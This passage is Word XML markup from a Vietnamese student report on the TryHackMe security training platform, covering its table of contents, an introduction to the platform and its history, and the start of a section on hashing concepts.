                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.6.1. Yêu cầu</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98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79</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AB55654" w14:textId="7F7964D6"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799" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.6.2. Công cụ</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799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80</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19BDE069" w14:textId="37537BB1"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800" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.6.3. Các bước thực hiện</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800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80</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2456D46B" w14:textId="771B2698" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050801" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.7. Vulnerabilities 101</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801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90</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="321FD028" w14:textId="62C9755A"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802" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.7.1. Khái niệm</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802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90</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09816CB8" w14:textId="607CEF69" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050803" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3.7.2. Các task của thử thách</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803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91</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45348EAF" w14:textId="22E2C2A9" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050804" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CHƯƠNG 4: KẾT LUẬN</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804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93</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C52A020" w14:textId="215BF667" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050805" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CHƯƠNG 5: TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc90050805 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FA3DF8D" w14:textId="58D5A937" w:rsidR="003C65F8" w:rsidRDefault="003C65F8">
          <w:r w:rsidRPr="00640CC0">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3177CB22" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:sectPr w:rsidR="006F1FD5" w:rsidRPr="00C97D8D">
          <w:footerReference w:type="default" r:id="rId13"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="6"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB898EA" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc90050718"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 1: GIỚI THIỆU CUỘC THI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="53CF2060" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc90050719"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1.1. Tryhackme là gì</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4C19D4C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ryhackme là một nền tảng trực tuyến dạy và thực hành bảo mật thông qua các lab thực hành ngắn. Các lab này mô phỏng các vấn đề bảo mật có thể gặp trong thế giới thực. Tryhackme cung cấp các nội dung cho người mới bắt đầu và những hacker có kinh nghiệm bao gồm các hướng dẫn và thử thách để hướng đến các phương pháp học tập khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160477DD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc90050720"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1.2. Lịch sử hình thành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="44771B26" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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ryHackMe được lên ý tưởng bắt đầu vào năm 2018 bởi hai người đam mê an ninh mạng, Ashu Savani và Ben Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28594DAF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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ể cho phép người dùng chia sẻ kiến ​​thức của họ, TryHackMe cho phép những người dùng khác (miễn phí) tạo một phòng ảo, kết hợp lý thuyết và thực hành. Đầu năm 2019, Jon Peters bắt đầu tạo phòng và đề xuất xây dựng nền tảng một cộng đồng, một nhiệm vụ mà anh ấy đã đảm nhận và đã thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505F3FE" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc90050721"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1.3. Môi trường đào tạo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="506DFA57" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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ệ thống kiến thức theo các </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, chia nhỏ theo các Modules. Người học có thể tự tìm hiểu về các mảng mà mình thích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629B5BF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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ỗi 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> sẽ gồm các </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Room</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> kiến thức. Trong Room sẽ có nhiều câu hỏi về nhiều lĩnh vực, điều này sẽ giúp chúng ta định hình được Vector tấn công vào hệ thống. Mỗi khi trả lời đúng câu hỏi, ta sẽ nhận được điểm. Xếp hạng của người tham gia sẽ được hiển thị ở trên </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Leaderboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E2792" w14:textId="5FD47DB1" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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au mỗi khi hoàn thành một </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Pathway</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, sẽ có 1 phần thưởng nho nhỏ để khích lệ tiếp tục chương trình học. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0D4F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hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE617A4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc90050722"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT ÁP DỤNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4225AC3F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc90050723"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2.1. Hashing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3A4DB32C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc90050724"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1.1. Khái niệm hashing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="51DF60F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ashing hay còn gọi là mã băm, nói một cách đơn giản hơn là một hình thức mã hóa dữ liệu một chiều dùng để bảo vệ dữ liệu gốc (dữ liệu trước khi mã hóa), tránh cho dữ liệu gốc lọt vào tay của những cá nhân hoặc tổ chức không được cấp phép sử dụng dữ liệu đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198F174" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc90050725"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1.2. Tính chất</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6373A84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ể hash một dữ liệu, dữ liệu đó sẽ được chạy qua một thuật toán hash và đầu ra sẽ là một chuỗi ký tự vô nghĩa (thường là ở dạng hexadecimal). Chuỗi ký tự vô nghĩa này được gọi bằng những cái tên như hash values, hashcodes, digets hay chỉ đơn giản là hashes. Các thuật toán hash dữ liệu thường cho ra các kết quả có cùng một độ dài (tính theo bytes) bất kể độ dài của giá trị đầu vào là bao nhiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CCF3E" w14:textId="33E1984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ột trong những tính năng đặc biệt của hash dữ liệu đó là mã hóa một chiều. Nghĩa là dù có được giá trị hash</w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cũng sẽ không có bất kỳ cách nào lật ngược lại quy trình hash để tìm lại dữ liệu trước khi được mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71775C1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ất cả các thuật toán được dùng để hash dữ liệu đều phải đảm bảo các yêu cầu cơ bản sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B147450" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Deterministic: Vào bất cứ thời điểm nào, cùng một dữ liệu đầu vào luôn luôn cho ra cùng một dữ liệu đầu ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEDD15" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Non-invertible: Việc đảo ngược quy trình hash để tìm được dữ liệu gốc từ dữ liệu được hash là điều gần như bất khả thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734350F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
